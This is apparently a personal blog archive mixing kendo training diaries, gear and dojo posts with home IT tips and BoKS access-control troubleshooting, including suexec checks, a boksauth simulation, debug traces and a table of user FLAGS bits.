The only part of the whole uniform that expresses the individual is the tenugui: a cotton towel, wrapped around the head. In Japan, tenugui have dozens of uses, from dish rag to headband, to table cloth, to decoration. And us kendoka use it to catch sweat and to keep our helmets clean(er). ^_^

Tenugui come in greatly varying designs. From very simple and plain, to colourful and intricately designed. Many tenugui are 100% meant for decoration and are sold at rather steep prices. There are shops specializing in the sale of these design concious towels.

And it's through their tenugui that kendoka get the chance to express a little individualism, character if you will. Many wear cloth with inspiring words or phrases. Others have cloth with their dojo's logo, or tenugui that were gifted at special occasions. Personally I already have quite a few to choose from and there are more on their way.

Each of these has some special meaning to me, serving as inspiration for me. The ones from Niels and Kaijuu are reminders of friendship. The Tigers one is also for fighting spirit. The Sakurajima volcano ones are for slumbering violence. The white rabbit one is because of this :D 

And of course the skeleton ones are as reminders of my loving wife and her never ending support in my kendo! They are named as follows:

With many thanks to JEDict for the help in translating ^_^


kilala.nl tags: , , ,

View or add comments (curr. 3)

Miyako Kendogu: Yoroi-gata 'Tsubasa' (ORDERED!)

2012-01-29 12:21:00

Miyako Kendogu Yoroi-gata Tsubasa set

A few days ago Miyako Kendogu (an international colab between Andy Fisher and Tozando Co.) announced their newly introduced "Tsubasa" bogu set. I've never heard anything but good reviews of Miyako supplies and have been considering buying a bogu from them. The only thing that's kept me back is their rather high price point. Where a starter bogu from Kendo24 would set me back roughly 350 euros (or one form Nine Circles is roughly 300), the stuff from Miyako usually starts at 500 euros and easily goes above 800. 

The introduction offer for the Tsubasa set is awesome though: 50% off! Meaning that the set would set you back 419 euros, instead of 840. Holy crap! And because international shipping is free, it's a steal! What's even better is that Andy assures me that Miyako adjusts men for kendoka who wear glasses for free. Wow.

That's a good enough offer to make me seriously consider it!

EDIT:

Holy shit! Holy crap! OMG!... Marli just OKed and ordered the set to my measurements!!!! I'm still doubting between panic and sheer overjoyment! *panic* *joy* 


kilala.nl tags: , , ,

View or add comments (curr. 4)

A stern lecture: we need to up our game!

2012-01-29 10:51:00

Yesterday's kendo practice was both great and a letdown at the same time. 

It was absolutely awesome to have so many kendoka turn up! No less than twenty people were present, divided 10:10 between people with and without bogu. And the practice that we did was wonderful, with many techniques I'd never done before! But I was also confronted heavily with a lacking in my stamina. 

During class I gave up no less than three times ( =_=;)

With the first, my arms just couldn't keep up with the pace. During the second I felt exhausted. During the third I felt like a tube of toothpaste, squeezed completely empty. It's no excuse and it's not a consolation either, but I wasn't the only one. Which led to a rather stern (and deservedly so!) lecture at the end of class. Sensei and fukushou were rather displeased with the lack of endurance shown during class. Especially during something as early and basic as warmup!

It's rather shameful that so many of us have these issues. Would you imagine how awful it'd make the Renshinjuku Almere dojo look during seminars or national events, if our students show fatigue so quickly?! It's come to the point that we're going to use bootcamp style warming up: if anyone drops out during an exercise, the whole group will need to redo the whole exercise. Kris-fukushou repeatedly refered to his speech from last week: our whole team needs to work towards a higher level! We shouldn't be happy puttering about at our current entry-level kendo!

Now. i'm not going to let this put a damper on my mood or my perseverance. On the contrary! Martijn and I started running practice and Sander and I have decided that we need to push eachother. We need to friggin' keep going! FIGHT! For such a philosophical martial art, kendo really is damn demanding on your physique.

With that aside... Waza practice had us doing all manner of stuff that's new and advanced to me! Hiki-men, hiki-men-kote, hiki-men-kote-do, all of which taught me that my initial steps/stomps backwards are too large. After my first strike I'm already out of range, so I can't make any follow-ups. The followed strings of kote, kote-men, kote-men-do and hiki-men back and forth across the gym. Jigeiko was a big letdown for me. I took on Nick, followed by Martijn and that was that. I couldn't go on anymore.

At the end of class there was one small extra that made me feel better though! Ton-sensei asked me how I thought I was doing, to which I replied that I'm not going to be proud of myself as my stamina is horrible and because I'm still making the same mistakes I was in my first month of kendo a year ago. Sensei indicated that he was actually quite pleased with my progress in bogu. For someone on his third week in armor I was apparently adjusting quite well. Nice to hear :)

Speaking of working towards a new level: I've volunteered to teach Aaron-sempai how to do shinai maintenance. At roughly eleven years he may be my junior by a factor two, but at kendo he is my senior. He's been doing it longer than I have and I can honestly say that I admire him for the potential he shows! He's got good fighting spirit, right now it's just his age that gets in his way. By teaching him the basics of maintenance I hope to help him along just a little bit. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Maintenance: iPhoto, HFS+ and AFP

2012-01-29 10:17:00

Laptops and drives

Over the past week Marli's Macbook had been performing worse than usual. Time Machine kept on hanging, Spotlight kept on using 100% CPU on one core and Safari and iPhoto were very slow. What with TM and SL being hard drive intensive software I reckoned I'd better check out the hard drive using Disk Utility (which does an fsck). Bingo: plenty of problems detected! To a point where DU informed me I needed to boot from another drive, because the laptop's drive was too broken. :(

Booting from the recovery partition using CMD-R quickly quickly gave me access to DU again, which after a while of running puked the following error: "Disk Utility can't repair this disk. Back up as many of your files as possible, reformat the disk, and restore your backed-up files.". Basically it's telling me to grab what you can and run to the hills! Oy vey! 

Luckily we regularly make full hard drive images of our laptops, using asr (the command line access to Disk Utility). Booting from Marli's drive image was a cinch, as was making an extra copy of her home directory from the laptop. Sure, Time Machine makes hourly backups, but it never hurts to have an extra copy! The course of action was:

Making the extra backup took the most time because Marli's 42GB was turned into 120GB because the "cp -rp" made symlinks into actual files; took four hours in all! The restoration was a snap: 1.5 hours for the drive image, 2 hours for the OS upgrade and software updates, 1 hour for the homedir restore. And most of that time was spent waiting, not actually doing anything. 

While waiting for Marli's laptop to do her thing I took it upon myself to give our NAS a once-over as well. The file systems had some minor problems which were fixed easily. I then performed maintenance on the iPhoto database using the built-in tools and by doing a sqlite vacuum. That made a huge difference! Finally, because our iPhoto resides on an AFP share on our NAS I tweaked the AFP kernel settings on both our laptops. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Second day of getting hit: still liking it!

2012-01-21 22:04:00

I don't know why, but today's class was a rather small group! Ton-sensei and Kris-fukushou led the training. Hugo and two newbies were doing basics and there were six of us in full armor: Tiamat, Aaron, Sander, Houdaifa, Charl and me. I guess we owe it to the smaller group that our rhythm.

0900-0930 was filled with kata as usual. Warming up included the stretching and the usual suburi, but then we switched to pairs to do contact haya-suburi. No running or footwork this time, we immediately got into armor. We practice kirikaeshi, men-uchi and kote-men as a group and then split up. Don't know what the armor-less folks were doing, but Kris took us through many interesting techniques, including suriage waza (parry on kote, then hit men) and maki waza (spiral the opponent's shinai to open a strike).

For fun and learning, the kendoka in bogu then all lined up for shiai with Charl (our only 1-dan student) who beat every single one of them. Class was then closed with uchikomi geiko, where all students had passes at Ton-sensei, Kris and Charl. During our debriefing Kris did impress upon us that he wasn't very pleased with the progress we're making... or actually, the lack thereof. All of us really need to step up to the challenge and push ourselves harder if we want to reach the next level as a group!

Notable flaws in my work today:

In closing, let me just say that I enjoy the hell out of participating in full! I'm so glad that I finally get to do real fights! I'm so grateful to Martijn, for lending me his helmet! _/-o_


kilala.nl tags: , ,

View or add comments (curr. 3)

iTunes Match: what could possibly go wrong?

2012-01-21 21:54:00

I was pretty happy when I got my hands on iTunes Match. Still am by the way. But Marli? Not so much! You see, when at least one of the people using the account actually care about things like play counts and star ratings, you need to take a really good approach in switching to Match. Case in point, the rather pissed off voice mail left during kendo practice this morning ^_^;

What'd happened? Thursday I'd immediately set my Mac to syncing with iCloud and yesterday morning it was done. It all works swimmingly and I was playing music from the cloud all day at the office. Great stuff! So in the afternoon I told Marli to enable it on her Macbook as well. Clickety-click and you're done. Until this morning when she was rather unpleasantly surprised to find that all of her playlists and her meticulously kept database had been fscked up. Because my Macbook was the first to sync, iCloud assumed that it was also -my- ratings and playcounts that mattered most. She also had now gone from a library listing of ~3300 songs, to ~9000 songs. And she really doesn't want to see all my music :D 

So! Here's my tips when sharing an iTunes Match account between two people, hoping that one of them (like me) does not care about play count and star ratings. 

  1. On the iTunes library of the person who does NOT care: reset all play counts and star ratings.
  2. On the iTunes library of the person who DOES care: make a backup of 'iTunes Library.itl' and then enable iTunes Match. Finish the whole syncing process.
  3. On the iTunes library of the person who DOES care: change all the smart playlists to include the extra rule "Location is on this computer".
  4. On the iTunes library of the person who DOES care: create a smart playlist which is "Location is on this computer" and "Media kind is music". This will act as the new, local library for this person.
  5. Finally enable iTunes Match on the other person's computer. He'll now get a bunch of ratings from the other user, but won't care ;)

The main library of the caring user will still show -all- of the music in iCloud, but at least the ratings and such will be retained.


kilala.nl tags: , ,

View or add comments (curr. 2)

Renshinjuku Almere sports clothing

2012-01-19 17:58:00

shirt, shirt, polo, sweater, jacket

I love putting design on clothes in vinyl or print. I've made festival shirts for us all, anime/japan shirts for my sister and Arrow Emblem clothing for myself. Recently I asked permission from Heeren-sensei, the founder of Renshinjuku kendo dojo, to use the Renshinjuku logo on some sports gear. I am very grateful that he allows me to do so. 

The group of people at our Almere dojo has been very welcoming and friendly to newbies. They're very supporting and I'm very proud to have become part of this team! I'd love to have a sweater or jacket with our dojo logo on it, to wear when I'm out running. That way I'll be reminded of my classmates and their support. I'll remember exactly why I'm trying to build more stamina :)

The picture above shows a few mockups I've put together at SpreadShirt.nl. I've always been very pleased with the quality of their work; their vinyl prints are very sharp!

EDIT:

Right, already I'm on the second revision. Dropped the big surname off the shirt and am just using Almere on it. The jacket and sweater will still have a surname on it (so I don't "lose" it), but much smaller on the front. Here is v1.


kilala.nl tags: , ,

View or add comments (curr. 0)

First time training in full bogu. What a great day!

2012-01-14 14:06:00

The day got off to a slow start. I was achy and dull and slow and had trouble waking up. First thing I did was to take my shaving gear downstairs to make myself look presentable for kendo practice. That's one of the many things I've learned about kendo: make sure that you are clean, look neat and that you have your stuff together. It's one of the many psychological aspects of the sport. It's a reassurance to yourself and it also signals to your classmates and opponents that you are ready and that you take things seriously. 

A trim and a shave later I double checked my bags and got our kid downstairs for breakfast. As expected, Martijn showed up at 0830 after which we piled into my Honda and drove to the dojo. We were running a little bit late. Class started as usual: get dressed, get your gear setup in the dojo and then warm up and practice kata. Martijn and I went through kata 1 through 4 twice and I got a rather important pointer from Raoul-sempai: my judgement of the maai is completely off! Martijn doesn't even have to step back in kata 1 in order to avoid my strike. I need to be more confident and closer. 

Warming up was the usual: stretching, suburi and footwork training. Extra attention was paid to the fumikomi aspect, which is my goal for 2012. With regards to fumikomi I'm doing plenty of things wrong!

The last point was also noticed during jigeiko, where Ton-sensei kept shoving me in my back after I struck him. Basically: "why the heck are you slowing down, while you should be speeding up?!" He's right of course ^_^

After warming up we all got geared up. I wasn't the slowest (huzzah!) but I did need to redo my men at least once afterwards. The chin pad I was wearing kept the men from sitting right, so I'll replace that with the pillow I made. The better part of the hour was spent on waza practice: debana-men, men/suriage-men, men/suriage-kote, kote/do, men/hiki-men. I might've forgotten some, or gotten names wrong though :D Maybe Hillen or Kris can name them all again. 

And the jigeiko! Because I was redoing my men I came late to the party and four pairs had already formed. So when Martijn bowed out I quickly grabbed the chance to 'dance' with Yann. Yann then was asked to sparr by Ton-sensei, but I followed quickly thereafter. And then class was already over! We officially closed the session in our traditional sense, after which Kris, Martijn, Charel and I quickly donned our men again! In preparation of the february 19th kyu tournament, Kris quickly walked me through the basics and etiquette of shiai. And finally ten minutes of jigeiko, which were interspersed with helpful comments and analysis. He was going easy on me ;)

Because I was late in going home I got dressed as quickly as I could. Mercifully my hakama cooperated perfectly when I folded it! :D Back home all my sweat drenched gear (it's never been this wet before!) was dispatched to the laundry and my bogu was set out to airdry. Speaking of "back home": my family had gone out to Bij Honing for sandwhiches! Fillet Americain and salmon salad make a great lunch! :9

To finish it all off, simply because we could, all three of us took a bath together. So now we're all relaxed, comfortable and squaky clean! I'll probably do a little bit of cleaning around the house this afternoon, take a short nap and fiddle around with Shadow Era.

What a great day!

EDIT:
Something else important that Kris taught me during our private jigeiko: "Don't let them see that you're tired". Sure, you're tired! But instead mask it by changing your pace. I'm not eightteen anymore and I can't go head to head using my younger opponents' styles. I can only keep up a flurry of blows for so long, so I'll need to be smart about it. When do I unleash a torrent of strikes? And when do I bide my time, using other techniques?

EDIT 2:
The Sankei kendo glasses worked a treat by the way! They steamed up a little bit later on during class, but once I got moving again that was quickly resolved. At the start of class they were uncomfortably tight, but after getting really into the swing of things I didn't even notice anymore. The pressure of the men himo on my temples was worse, as was the sting of the strikes to my head ^_^


kilala.nl tags: , , ,

View or add comments (curr. 2)

I'm competing! Borrowed a men!

2012-01-09 21:31:00

Me wearing a borrowed men

o WOOHOO! /o/

Last saturday we discovered that the uchiwa in my borrowed men from Ton-sensei wasn't wearable with my glasses. Despiriting and all. But then Martijn gave me an awesome offer! He's willing to lend me -his- brand new men, so I can practice in the dojo and even take part in the dutch kyu tournaments in february!

FSCK YEAH! 

Domo arigatou Martijn!


kilala.nl tags: , , ,

View or add comments (curr. 4)

Kendo: new year's goals

2012-01-07 14:25:00

Learning kata 4

Today was the first class of 2012. It wasn't very busy, but it was a nice class nonetheless! We even had two newbies. Martijn also taught me the basics of kata number 4 (picture above), which really is a pretty cool one!

Sensei and fukushou asked us to pick one or two goals for this new year, which we were to attain by the end of the year. I picked fumikomi: by the end of 2012 I want to be able to pull of decent and consistent fumikomi.

Learning points from today's class:

Marli came to class to take photographs; that was great :) She was originally invited to make our 2012 groupshot, but then also stayed to shoot during the rest of class.


kilala.nl tags: , ,

View or add comments (curr. 2)

Feeling extremely frustrated

2012-01-06 21:10:00

*sigh* I'm feeling very, very awkward. I'm conflicted, I'm annoyed, I'm pissed off and I just don't know what to do. 

My eyesight is awful, that's no secret. I am also a complete pansy, that's no secret either. I cannot force myself to wear contacts, so it's just glasses for me. Sadly, the kendo glasses I ordered recently just don't seem to be working with the standard helmets I've encoutered so far. Meaning that for the first time in my life my eyesight is going to prevent me from doing something I love: without good eyesight and without proper protection I'll never be able to take part in kendo

This has made me rethink churgery. (EDIT: "churgery"?! Really! I must've been out of it yesterday!)

Laser correction however is not performed under general anasthesia meaning that it's not going to happen. If I can't put contacts in or even touch my own eyeball, then no way in hell is anybody going to put clamps on my eyeball and prod my eyes. No. I need to be out cold. Which leaves us with lens implants. Sounds good to me.

Only, it'll cost roughly 2000 euros per eyeball. And it requires that my eyes are stable, which they aren't. So I'm probably not a viable patient and it'll cost us quite some money out of our own pockets. 

So many unanswered questions. So few options. But I do know this: I really, really want better eyes. And I really, really want to do kendo. I'll need to have a chat with my GP so she can refer me to an optometrist or eye doctor for a good talk. 

Honestly. If there ever was anything I could magically change about my body, it'd be my eyesight. Muscles I can take care of myself and I don't care about the stereotypical male "Oooh, I wish I could change that!". My eyes. Come on, magic genie! Come on, Celestia!

In the mean time I'll just keep on looking for a way to fit glasses inside my kendo helmet. That's gonna cost a penny too :|

EDIT:

It might be "wrong" thinking, a broken thought process perhaps, but I feel it's ironic, despiriting and humbling that I'm letting me stop myself from practicing a martial art that is as much about spirit and mental force as it's about physical strength simply because "I can't do something". To the point that I feel unworthy even trying to be part of it. If I can't overcome my own fears and reflexes over touching my eyeballs, how the heck am I going to overcome my adversaries?! 

Plenty of people have assured me that "it's easy to learn" and "you'll definitely get used to it". But then the frustrated voice in me yells, "Really?! Really? How are you going to teach an adult to overcome a reflex that's been burned into his mind twenty years ago? The same adult who gets violent to anybody going near his eyes?". It's not about getting me to physically touch my eye, it's about overcoming childhood traumas that have become deeply ingrained. 

Maybe I have it the wrong way around. Maybe years of kendo will help me overcome this crap. Maybe I'll be able to try contacts in a few years -because- of kendo. And to think that I was this --> <-- close to saying "I'm not worthy of studying kendo".


kilala.nl tags: , , , , ,

View or add comments (curr. 12)

Kendo equipment maintenance

2012-01-03 07:15:00

tare zekken kote and a men pad

As I wrote a few days ago we have been using the year's end downtime at the dojo for maintenance of our equipment.

On the 30th Martijn came to visit, to theorize about our practice dummy and to check his shinai. He also was kind enough to put new lacing in my kote. Both tasks were easily done using the wonderful and free kendo equipment manual PDF. That book has taught me so much! That same evening I put a new belt on the tare and started thinking about sewing a zekken.

Which is exactly what I did! Employing a rather crude split stich I embroidered my name and our dojo's name, as per the standard for zekken. Let me tell you, a thirty-something guy doing embroidery on the train draws some weird looks ;) Now, the result might not be beautiful, but I'm happy nonetheless. And once my 'real' zekken comes in from kendo24 I can still use this one as a small bag to keep my valuables in the dojo.

Finally I put together a simple pillow to put inside the men I borrowed from Loyer-sensei. It's a bit too big for me and the pillow provides enough padding to keep it in place. That's fifteen euros saved right there!

I really enjoy how kendo (a very active and aggressive sport) has lead me to so many calming and relaxing manual activities! I get a lot of fulfilment from knowing that I can properly honor my equipment by providing it with the required maintenance myself. Some people might swing a shinai like a broomstick or muffle their hakama into a gym bag, but to me those things are more than simply tools. And by letting kendo engage my creative side it's become a bigger part of my life.

Now if only I could learn to apply the psychological and mental lessons in real life as well! ;)


kilala.nl tags: , ,

View or add comments (curr. 3)

Preparing for the next step in kendo

2011-12-29 19:36:00

The design for my zekken

In the new year things will get serious!

My kendo glasses are being made, so I can start wearing my men. That completes my bogu, as I've already been wearing the do, kote and tare. Which means that yes, I'm going to get into real geiko and I can compete in shiai! And as I have mentioned before I'll jump into the deep end in 2012! January will see our next kyu examinations and in February I'll join the kyu-grade tournament.

This will require a few last preparations:

The design for my zekken is shown on the left. Along the top is the name of our dojo, Renshinjuku (錬心塾) and along the bottom is my surname. The middle is a repeat of my surname, but in katakana, which reads SURATA. The fine folk at kendo24 are on holiday this week and my favored shinai (the "kenshi" model) is sold out, so I hope my order will reach Almere in time. 


kilala.nl tags: , ,

View or add comments (curr. 5)

New (kendo) glasses ordered

2011-12-24 11:26:00

kendo glasses

This morning I walked into the local SpecSavers to get measured for new glasses. My current glasses have never really worked out properly for me, so now it's within two years instead of three. I have to say that today's measurement was worrisome for me. I'll soon make an appointment with an optometrist, because I wonder if there's something rather wrong with my eyes. Time to get over my fear of eye doctors :(

Left: Sp = -10.25, was -9.50 in december 2009 and -9.00 in december 2006.

Right: Sp = -10.25, was -9.75 in december 2009 and -9.50 in december 2006.

Today I ordered lenses for my kendo glasses, which have priority as my first tournament is up in february. In January I'll go back to the shop with Marli, so we can pick out frames for new day-to-day pairs. At least the price is right at SpecSavers! I'm getting lenses with an RI of 1.6 and they come at 95 euro for the pair. Not a-piece, but for the pair! The SpecSavers will charge me 50 bob to cut them and install them in my frame. That's -still- half of what we used to pay at Pearl! 

Kris, if you're reading this: with some luck you'll get to really knock me around, come January! ^_^


kilala.nl tags: , , , ,

View or add comments (curr. 3)

BOKS: Mind your log files, part 2

2011-12-19 00:00:00

A few months back we discussed how incorrect log settings can mess with your auditing and logging in "Mind your log files!". Today we'll take a look at another way your logging can go horribly wrong.

Case in point: keystroke logs.

BoKS' suexec facility comes with optional keystroke logging, which allow you to capture a user's input and output. This is particularly handy when providing suexec su - user access to an applicative or super user. These keystroke logs are stored locally on the client system, where they are hashed and filed. The master server will then pull these log files from each client for centralized storage, after which the files will be cleaned from the clients. Optionally, these log files will then be pushed to replica servers for backup purposes.

Things go awfully wrong when the master server's kslog storage is underdimensioned. Once the storage location for keystroke logs is filled, the master server will stop pulling and cleaning files from client systems. This means that $BOKS_var/kslog, which is meant for temporary storage, now becomes rather permanent storage. And since many BoKS administrators leave $BOKS_var as part of the /var file system you are now filling up /var. If the BoKS client system is not protected against a 100% filled /var you are now looking at a very, very nasty situation. You might end up crashing client systems, or causing other erratic behaviour.

TLDR:


kilala.nl tags: , ,

View or add comments (curr. 0)

Closing 2011 at Renshinjuku Kendo Almere

2011-12-17 19:09:00

Today was the closing of 2011 at Renshinjuku Kendo in Almere (錬心塾剣道 アルメレ). And for this occasion our trainers had set up an interesting day :)

The suburi for warming up were changed dramatically. After the usual jogeburi, we were explained a new "game". Every member of the school would sound off ten strikes in turn and everybody would chime in with a shout of "men!". Since there were fifteen people, that makes for a hundred and fifty strikes. Did I mention it was haya suburi?! (short video of haya suburi) I failed right after my turn, which was after fifty I believe ;_;

I did my best to have great kiai and was one of the few whose counting resounded loudly through the hall ^_^

After that was another fun little game: everybody would take turns hitting fast kote on motodachi for ten seconds straight. The challenge was to do as many good strikes, combining fumikomi, kiai and strike. I managed to get up to 32 although that could've been more had I paid more attention to footwork and relaxation. 

After that: kiri kaeshi (another short video), which didn't go too well at all. The kendoka without full bogu were taken apart by Kris to focus on the basics: footwork and strikes. We were all quite sloppy :( Then, more and more basics, including stuff to focus on reaction times and snappiness. It was a great last class for the year and I felt awesome in the end. 

Today's big learning points!

I'm very much looking forward to 2012. In january we will have our next exams and in february I plan on taking part in the kyu-grade tournament with Martijn. That means I'd better get a move on with my kendo glasses as I'll need to be in full bogu for the tourney!


kilala.nl tags: , ,

View or add comments (curr. 2)

BoKS debugging example

2011-12-16 00:00:00

 

Yesterday served as a reminder that we can all fall prey to stupid little things :)

Symptom: A customer of mine could use suexec su - oracle on a few of his systems, but not on some of his others.

Troubleshooting: Everything seemed to check out just fine. The customer's account was in working order and neither root, nor the target account were locked or otherwise problematic. And of course the customer had the required access routes.

$ suexec lsbks -aTl *:customer | grep SXSHELL
suexec:*->root@HOSTGROUP%CUSTOMER-PG-SXSHELL (kslog=3)

$ suexec pgrpadmin -l -g CUSTOMER-PG-SXSHELL | grep oracle
/bin/su - oracle
/usr/bin/su - oracle

So, why does BoKS keep saying that this user isn't allowed to use suexec su - oracle on one box, but it's okay on the other?

12/13/11 10:00:57 HOST1 pts/1 customer suexec Successful suexec (pid 16867) from customer to root, program /bin/su
12/13/11 10:00:57 HOST1 pts/1 customer suexec suexec args (pid 16867): - oracle
12/13/11 10:01:12 HOST2 pts/5 customer suexec Unsuccessful suexec from customer to root, program /bin/su. No terminal authorization granted.

I thought it was odd that the logging for the failed suexec seemed "incomplete", but wrote it off as a software glitch. However, this is where alarm bells should've gone off!

So I continued and everthing seemed to check out: on both hosts /bin/su was used, on both hosts oracle was the target user and the BoKS logging supported it all. So let's try something exciting! Boksauth simulations!

Obviously the simulation for HOST1 went perfectly. But then I tried it for HOST2:

$ suexec boksauth -L -Oresults -r 'SUEXEC:customer@pts/1->root@HOST2%/bin/su#20-#20oracle' -c FUNC=auth TOUSER=root FROMUSER=customer TOHOST=HOST2 FROMHOST=HOST2 PSW="iascfavvcfHc"

ROUTE=SUEXEC:customer@pts/1->root@HOST2%/bin/su#20-#20oracle
FUNC=auth
TOUSER=root
FROMUSER=customer
TOHOST=HOST2
FROMHOST=HOST2
PSW=iascfavvcfHc
$HOSTSYM=MASTER
$ADDR=192.168.10.20
$SERVCADDR=192.168.10.20
WC=#$*-./?_
FKEY=CUSTOMER-HG:customer
UKEY=HOST2:root
RMATCH=suexec:*->root@CUSTOMER-HG%CUSTOMER-PG-SXSHELL,kslog=3
MOD_CONV=1
AMETHOD=psw
$PSW=ok
VTYPE=psw
RETRY=0
MODLIST=kslog=3,prompt=+1,su=+1,passroot=+1,use_frompsw=+1,su_fromtoken=+1,chpsw=-1,concur_limit=-1
$STATE=9
$SERVCVER=6.5.3

What I was expecting to see was STATE=6 and ERROR=203. But since the ERROR= field is absent and the STATE=9, this indicates that the simulation was successful. Now things get interesting! So I asked my customer to try the suexec su - oracle with me online, while I ran a trace on the BoKS internals. This resulted in a file 10k lines long, but it finally got me what I needed.

In the course of the debug trace, BoKS went through table 37 (suexec program group entries) to verify whether my customer's command was amongh the list. It of course was, but BoKS said it didn't match!

wildprogargscmp_recurse: wild = /usr/bin/su#20-#20oracle, match = /bin/su^M
wildprogargscmp_recurse: is_winprog = 0^M
wildprogargscmp_docmp: Called, wild /usr/bin/su#20-#20oracle match /bin/su^M
wildprogargscmp_docmp: Progs do not match^M
wildprogargscmp_docmp: return 1 (0 means match)^M
wildprogargscmp_recurse: wild = /bin/su#20-#20oracle, match = /bin/su^M
wildprogargscmp_recurse: is_winprog = 0^M
wildprogargscmp_docmp: Called, wild /bin/su#20-#20oracle match /bin/su^M
wildprogargscmp_docmp: fnamtch wild - sumdev, match did not match^M
wildprogargscmp_docmp: return 1 (0 means match)^M

This threw me for a loop. So I went back to the original BoKS servc call that was received from client HOST2.

servc_func_1: From client (HOST2) {FUNC=auth01TOHOST=?HOST01FROMHOST=?HOST01TOUSER=root01FROMUSER=customer01FROMUID=181801FROMTTY=pts/5201ROUTE=SUEXEC:customer@pts/52->root@?HOST%/bin/su}^M

And then it clicked! One final check confirmed that I'd been overthinking the issue!

$ suexec cadm -l -f ENV -h HOST2 | grep ^VERSION
VERSION=6.0

It turns out that HOST2 was still running BoKS version 6.0. While the suexec facility was introduced into BoKS aeons ago, only per version 6.5 did suexec become capable of screening command parameters! So a v6.5 system would submit the request as suexec su - oracle, while a v6.0 host sends it as suexec su. And of course that fails.

It's awesomely fun to dig around BoKS' internals, but in this particular case it'd have been better if I'd spent the hour on something else :)

 


kilala.nl tags: , ,

View or add comments (curr. 0)

Sports, kendo, perseverance and such

2011-12-03 20:52:00

The past few weeks I have been a bit frustrated with myself. Since coming home from Japan I haven't properly gotten back to my sports regime. Only last week have I tried to get back to running on a daily basis, which aggravates me because I walk the same piece of road on a daily basis. So why not run instead of walking?! Well, at least I'm not taking the buss to the office.

Same for kendo. Before the holiday I used to train at home at least once a week, together with Martijn. Of course, these days the weather outside is awful, but I can still train by myself in the attic like I did when I just got started. But I haven't...

But! I'm not quitting kendo! I enjoy this way too much and it's very educational, both physically and mentally. The social aspect of it is also very pleasant, as my classmates are cool guys.

Points to take away from today's lesson:

 


kilala.nl tags: , , ,

View or add comments (curr. 5)

BOKS: Demystifying the user FLAGS field

2011-11-28 00:00:00

 

The BoKS database can be an interesting place to poke around, "mysterious" at times. For example, there's the enigmatic "FLAGS" field which resides in table 1, the user data table. Among the usual user information (name, host group, user class, password, GID, UID, etc) there's the "FLAGS" field which contains a numerical value. What this numerical value represents isn't clear to the untrained eye.

The "FLAGS" number is a decimal representation of a hexadecimal number, where each digit represents a number of flags. The value of each digit is determined by adding the values of the flags enabled for the user. You could compare it to Unix file permission values, like 750 or 644, there each digit is an addition of values 1, 2 and 4 (x, w and r).

Below you'll find a table of the flags that can be set for any given user account.

Max. valueF3E3

Flag MSD     LSD
User deleted - - - 1
User blocked - - - 2
Timeout not depend on CPU - - 2 -
Timeout not depend on tty - - 4 -
Timeout not depend on screen - - 8 -
Windows local host account - 1 - -
Windows domain account - 2 - -
Lock at timeout, no logout 1 - - -
User must change password 2 - - -
Manage secondary groups 4 - - -
Check local udata 8 - - -

So for example, a value of 16386 equals a value of 0x4002, which means that the user is blocked and that BoKS is used to push his secondary group settings to the /etc/group file on each server.


kilala.nl tags: , ,

View or add comments (curr. 0)

Kendo omamori: charms for success and fighting spirit

2011-11-13 13:14:00

Omamori from Nara for success in sports

As I wrote before I bought a number of omamori when we were in Japan: amulets purchased at temples, for various purposes. For example: the one I bought for Marli is for a happy marriage, but there's plenty of other kinds. Good luck, aid in studies, good health, and plenty, plenty more. 

For my dojo's sensei and trainers I bought charms from the Hakozaki shrine, dedicated to Hachiman (a god of war and harvest). The ones I bought were for success in sports and seeing how Hachiman is protector of warriors I reckoned that was appropriate for kendoka and kenshi. It gladdens me that my teachers were happy with the token of appreciation and at least two of them now wear their omamori on the inside of their do

Now it's time to delve a little into the one I bought for myself. Bought at the Todaiji temple in Nara the origin is a bit of a contrast with my teachers' amulets. Hakozaki's shrine is shintoistic and dedicated to a god of war, while Todaiji is a buddhist temple; we all know the buddhist's take on violence. 

The creature, or person, depicted on my omari is Misshaku Kongō (密迹金剛), also called Agyō (阿形), one of the two Nio: wrathful and strong guardians of the Buddha. To quote Wikipedia:

"They are manifestations of the Bodhisattva Vajrapāṇi protector deity and are part of the Mahayana pantheon. According to Japanese tradition, they travelled with the historical Buddha to protect him. Within the generally pacifist traditions of Buddhism, stories of Niō guardians like Kongōrikishi justified the use of physical force to protect cherished values and beliefs against evil."

Agyō is a symbol of overt violent, as oppsoed to Ungyō who symbolizes latent strength. I reckon both make great deities for a bit of backup in kendo ^_^

Funnily enough, Flickr user GreenTea has the exact same omamori on his (or her?) do. The fine people at Miyako Kendogu also sell an omamori specifically for success in kendo, however Andy Fisher later told me this is not actually a blessed amulet, but instead "rather they are more of a novelty/souvenir type omamori". Of course the best places to buy omamori for budo sports is from the Katori and Kashima shrines, origin of budo. Those shrines were out of our way though, being east of Tokyo.

Interestingly I've learned that Amsterdam is home to Europe's only shinto shrine: Guji Holland Yamakage Shinto Shrine. At least there's a place close to home where we can safely (or at least in a traditional fashion) dispose of the omamori once they have served their purpose. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Head cold? Screw it and let's fight!

2011-11-12 15:22:00

Thomas in his helmet

I've had a headcold all week, but decided to go to kendo practice anyway. I've been missing waaaaay too many classes, between our holiday and last week's absence. Aside from my kiai lacking severely (slimy vocal chords) it was a very educational class. 

Warmup was different, with a few less stretches than normal and no footwork or running at all. On the other hand, before that the group did longer kata practice than usual. We immediately went into kihon, doing kirikaeshi, various men strikes and kote-men sequences. After that the groups were split between bogu wearing folks and those without armor. My smaller group practiced maki waza (where you gain center by spinning your opponent's shinai in a loop) and hiki-men (where one strikes men on a backwards lunge).

Lessons to take away from today's class:

Class was finished with kakari geiko and uchikomi geiko: basically, each of us gets to attach the teacher as often and as fast as possible for X amount of time. 

Sadly I can't partake in tomorrow's "central training" where a few dozen kendoka from all over the Netherlands gather. Full armour is a requirement, so that's it for me. I hope to have my kendo glasses completed by january, so I can attend the next practice. Speaking of, you can see the glasses in the photograph.


kilala.nl tags: , ,

View or add comments (curr. 3)

BoKS: Successful login, but no logging

2011-11-04 00:00:00

 

Another fun one!

Case: Customer attempts to login, succeeds, then gets kicked from the system immediately with a session disconnect from the server. The BoKS transaction log however does not show any record of the login attempt.

Symptoms:

Troubleshooting:

Debugging:

  1. Key exchange
  2. User identification
  3. User authentication
  4. Session startup

Trace shows failure when forking shell for customer.

debug2: User child is on pid 495766
debug3: mm_request_receive entering
Failed to set process credentials
boks_sshd@server[9] :369851 in debug_log_printit: called. Failed to set process credentials151212
boks_sshd@server[9] :370000 in debug_log_printit: not in cache, add
